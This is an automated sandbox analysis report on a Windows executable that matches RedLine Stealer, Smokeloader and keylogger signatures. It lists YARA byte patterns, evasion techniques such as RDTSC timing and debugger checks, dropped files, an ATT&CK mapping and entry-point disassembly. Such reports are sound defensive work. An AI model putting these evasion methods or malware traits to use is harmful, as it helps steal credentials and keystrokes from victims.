Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:756303
MD5:2479739c5d062ecb325147623241f007
SHA1:4394b6d2ca4ed82a5f2d70d10cd05cfa3b35ab2c
SHA256:728de9789af5f2ebc9ac2fac80fee25b186bc5b3acb960650934377f0c77726d
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
Yara signature match
One or more processes crash
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Keylogger Generic
Uses Microsoft's Enhanced Cryptographic Provider
PE file contains executable resources (Code or Archives)

Classification

  • System is w10x64
  • file.exe (PID: 3548 cmdline: C:\Users\user\Desktop\file.exe MD5: 2479739C5D062ECB325147623241F007)
    • rundll32.exe (PID: 5248 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source: Process Memory Space: file.exe PID: 3548
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: file.exe Virustotal: Detection: 38%
    Source: file.exe Joe Sandbox ML: detected
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00878884
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00881940
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,0_2_0087885C
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008799FF CryptDestroyHash,0_2_008799FF
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087A511 CryptReleaseContext,0_2_0087A511
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00884967 CryptReleaseContext,0_2_00884967
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00883F6C CryptDestroyHash,0_2_00883F6C

    Compliance

    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
    Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: file.exe
    Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: file.exe
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D450 FindFirstFileW,FindClose,0_2_0040D450
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004235B0 FindFirstFileW,FindClose,0_2_004235B0
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040CE84
    Source: file.exe, 00000000.00000002.258207764.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: Yara match File source: Process Memory Space: file.exe PID: 3548, type: MEMORYSTR

    System Summary

    Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00881940 0_2_00881940
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00897244 0_2_00897244
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00885B34 0_2_00885B34
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008770C4 0_2_008770C4
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BA8DC 0_2_006BA8DC
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00889622 0_2_00889622
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088C79C 0_2_0088C79C
    Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040ACB4 appears 34 times
    Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A3C0 appears 76 times
    Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A0C0 appears 300 times
    Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040AEFC appears 33 times
    Source: file.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
    Source: file.exe Virustotal: Detection: 38%
    Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027667C6 CreateToolhelp32Snapshot,Module32First,0_2_027667C6
    Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess graph_0-21267
    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
    Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5248
    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll
    Source: classification engine Classification label: mal60.evad.winEXE@4/5@0/0
    Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: file.exe Static file information: File size 3776000 > 1048576
    Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x386000
    Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: file.exe
    Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: file.exe

    Data Obfuscation

    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00422F40 push ecx; mov dword ptr [esp], ecx 0_2_00422F44
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02767597 pushad ; iretd 0_2_02767598
    Source: Serpodtudpwhhta.dll.0.dr Static PE information: section name: .didata
    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0085E760
    Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000042A6EB0 second address: 00000000042A778E instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], edx 0x00000005 mov dword ptr [ebp-24h], 0000000Dh 0x0000000c mov eax, 00000001h 0x00000011 cmp eax, 00000000h 0x00000014 jnbe 00007F93209DD1A3h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 sub eax, dword ptr [ebp-04h] 0x0000001c cmp eax, dword ptr [ebp-24h] 0x0000001f jnl 00007F93209DD1AAh 0x00000021 inc dword ptr [ebp-14h] 0x00000024 jmp 00007F93209DD810h 0x00000029 mov eax, 00000000h 0x0000002e cmp eax, 00000000h 0x00000031 je 00007F93209DD1A3h 0x00000033 cmp dword ptr [ebp-14h], 02h 0x00000037 jng 00007F93209DD3DAh 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-21263
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D450 FindFirstFileW,FindClose,0_2_0040D450
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004235B0 FindFirstFileW,FindClose,0_2_004235B0
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040CE84
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027660A3 push dword ptr fs:[00000030h] 0_2_027660A3
    Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,0_2_0087C50C
    Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_0040D588
    Source: C:\Users\user\Desktop\file.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0040CA28
    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: file.exe, 00000000.00000003.243980722.000000007F700000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.252501992.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000000.255187116.0000000003EC1000.00000020.00000001.01000000.00000004.sdmp, Serpodtudpwhhta.dll.0.dr Binary or memory string: MSASCui.exe
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Command and Scripting Interpreter
    Path Interception1
    Process Injection
    1
    Virtualization/Sandbox Evasion
    1
    Input Capture
    12
    Security Software Discovery
    Remote Services1
    Input Capture
    Exfiltration Over Other Network Medium2
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts11
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Archive Collected Data
    Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Obfuscated Files or Information
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Rundll32
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Software Packing
    Cached Domain Credentials112
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    Source: file.exe, Detection: 39%, Scanner: Virustotal
    Source: file.exe, Detection: 100%, Scanner: Joe Sandbox ML
    No Antivirus matches
    No contacted domains info
    No contacted IP infos
    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:756303
    Start date and time:2022-11-30 00:22:09 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 8m 48s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:file.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal60.evad.winEXE@4/5@0/0
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 0.4% (good quality ratio 0.4%)
    • Quality average: 77.5%
    • Quality standard deviation: 0.5%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for rundll32
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.189.173.21
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
    • Not all processes were analyzed, report is missing behavior information
    Time: 00:23:18, Type: API Interceptor, Description: 1x Sleep call for process: WerFault.exe modified
    No context
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):65536
    Entropy (8bit):0.9485641811025363
    Encrypted:false
    SSDEEP:192:p6lia0oXaHqqBIKjed+Mb/u7sqS274ItWc:0liMXyqqBIKjet/u7sqX4ItWc
    MD5:86B4D7D5A7632D224C45634319F9DDCF
    SHA1:4C72DCDB359F85A40C573C9F8B21E6D918E66635
    SHA-256:76A197B110567751607902657F4C8C73EAE08E9A5F40C3E6A5BDB4B56F6C8352
    SHA-512:9F842FC1D5724DB0F20F7C788A0E79991F1AEA19FCFC8322A379FF7BC6A562B828A5683B4F1CD68965EB0D74C27C0829EBEAD0AB8C35824E36E5014A6A17FE1A
    Malicious:false
    Reputation:low
    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.0.1.9.3.0.7.1.0.7.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.0.1.9.4.6.6.4.8.3.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.2.6.8.1.d.-.9.d.a.2.-.4.c.6.f.-.b.3.6.1.-.c.0.5.0.f.3.9.1.9.a.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.1.4.6.1.1.0.-.c.b.2.6.-.4.5.1.d.-.9.b.8.b.-.4.c.8.9.9.f.4.6.2.3.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.0.-.0.0.0.1.-.0.0.1.a.-.b.f.3.9.-.d.1.f.9.9.4.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4640
    Entropy (8bit):4.463699038830804
    Encrypted:false
    SSDEEP:48:cvIwSD8zs7JgtWI9rjWgc8sqYj28fm8M4JCdsFIAaFov+q8/RgEAR4SrSz6d:uITfVISgrsqYnJvIuvE1MDWz6d
    MD5:CD2574D210A7A42D1B4B2DCA3FC3D1C1
    SHA1:02000F08ADFB84655075CFFB69B6A9CB52C2A03C
    SHA-256:BC8C2BE9F9D1DB01049430C046927F5450F9E24E957B336F22CBE5021436A9C3
    SHA-512:7C865D49D91C1BB8568FCAA5D6CC7150789E676358A38D86C937787EFF463765A80FFC72C4A2FF6D67C5819C7333C8376DDAB081789119D4A7527D6773049370
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802493" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):6306
    Entropy (8bit):3.713455556373279
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNimP6ALa0ZDYTMSmGCprY89bxGKsfTUzcm:RrlsNiO6SaIDYTMSmbxGpfT6p
    MD5:BBBE86D86C59A9FFB64F22071FEDA7CA
    SHA1:09E81EF93A62EF6326ADF10B6E1B62BDC047B407
    SHA-256:199C6EA74D0B7C9B08E055E4E0B1B27BFEB213ECF41EF3473659F414199C92C8
    SHA-512:25CA4D998F69F01D0712C7C904545D27E748FECEFE260F84EEBD955562BB3D779F61E2A5CD6165E2A7358801CE319F1A281DF5FBEB96F719CE250E99AB46A13E
    Malicious:false
    Reputation:low
    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.4.8.<./.P.i.d.>.......
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 08:23:13 2022, 0x1205a4 type
    Category:dropped
    Size (bytes):47656
    Entropy (8bit):2.1094804680206685
    Encrypted:false
    SSDEEP:192:YpvotW/mZyO5SkbDV8+T1szomNet4r5j3Hl1NqwWk:ae5LbZ8+T1bceAZ3hck
    MD5:B8F33F0009F3DDE318CB9B992C517AEB
    SHA1:05A2D6FAEAF1B9A1D05959641B7871480F8782C2
    SHA-256:7EAE34186E263D33DD21713C8D48A45FFC0BC5D9D75AF9D5A71AF52B677F5730
    SHA-512:04EF2D049D1D9D3678A14FCA62435B725EA9A79E264A56866F2B7A9C88DDDC122A5AB754F75F1CA262CDF2C38A8D7CE4E53F3C24671B5FC81251B656774D7CF1
    Malicious:false
    Reputation:low
    Process:C:\Users\user\Desktop\file.exe
    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):4494336
    Entropy (8bit):6.573454988842364
    Encrypted:false
    SSDEEP:98304:2Ekp3AUUgGFofLw++PxAbc5rh5Ar/04TAYP:gp31UtFmLw95Abc5rh5Ar/NTA
    MD5:3D3D6C4F7A605B366E27DAA16D5C50F5
    SHA1:78B8FE5C09838213D0A8B1A4D4FF727C989D2AD2
    SHA-256:011D953568F11D2DC9752807D15F50144DF7D5D4277B19278477B6AC7F920804
    SHA-512:3AD1AA5FBA5BD1D45FBAC6BB4D40B6CF59B45F2C6CA5F8BCC90BA1FB16042D8D7804A96FD9738FE320E13508E623B79DE149E2F5745E8E363301E9DB119CBD20
    Malicious:false
    Reputation:low
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.994112157171111
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:file.exe
    File size:3776000
    MD5:2479739c5d062ecb325147623241f007
    SHA1:4394b6d2ca4ed82a5f2d70d10cd05cfa3b35ab2c
    SHA256:728de9789af5f2ebc9ac2fac80fee25b186bc5b3acb960650934377f0c77726d
    SHA512:1c5c4d7d7fd5a7f18fed87a0d66b95b26ebfda33b4aa4f66fd8fd4432e07ebc6e6289a27ffccc1cf99e659aeb80434e833baa299ab140d82c0bcb7d863a58301
    SSDEEP:98304:CIPeMtJl37YfXo0/PrjRkwoD8sOr+616vbgD7op:CIPeMh37YfXZPvRkww3OrNEgo
    TLSH:C9063396722288F5C386833C17D0F1306D7F78936A514947F7E42A2CC77A5DAE668F48
    Icon Hash:d4b4b0e0f0eaf0c0
    Entrypoint:0x404c97
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x60E5ACA2 [Wed Jul 7 13:31:14 2021 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:2ac0f7085258eff31142b9f87cb0f218
    Instruction
    call 00007F93209C0D2Ch
    jmp 00007F93209BAF0Dh
    sub eax, 000003A4h
    je 00007F93209BB0B4h
    sub eax, 04h
    je 00007F93209BB0A9h
    sub eax, 0Dh
    je 00007F93209BB09Eh
    dec eax
    je 00007F93209BB095h
    xor eax, eax
    ret
    mov eax, 00000404h
    ret
    mov eax, 00000412h
    ret
    mov eax, 00000804h
    ret
    mov eax, 00000411h
    ret
    mov edi, edi
    push esi
    push edi
    mov esi, eax
    push 00000101h
    xor edi, edi
    lea eax, dword ptr [esi+1Ch]
    push edi
    push eax
    call 00007F93209BC29Eh
    xor eax, eax
    movzx ecx, ax
    mov eax, ecx
    mov dword ptr [esi+04h], edi
    mov dword ptr [esi+08h], edi
    mov dword ptr [esi+0Ch], edi
    shl ecx, 10h
    or eax, ecx
    lea edi, dword ptr [esi+10h]
    stosd
    stosd
    stosd
    mov ecx, 00796ED8h
    add esp, 0Ch
    lea eax, dword ptr [esi+1Ch]
    sub ecx, esi
    mov edi, 00000101h
    mov dl, byte ptr [ecx+eax]
    mov byte ptr [eax], dl
    inc eax
    dec edi
    jne 00007F93209BB089h
    lea eax, dword ptr [esi+0000011Dh]
    mov esi, 00000100h
    mov dl, byte ptr [eax+ecx]
    mov byte ptr [eax], dl
    inc eax
    dec esi
    jne 00007F93209BB089h
    pop edi
    pop esi
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    sub esp, 0000051Ch
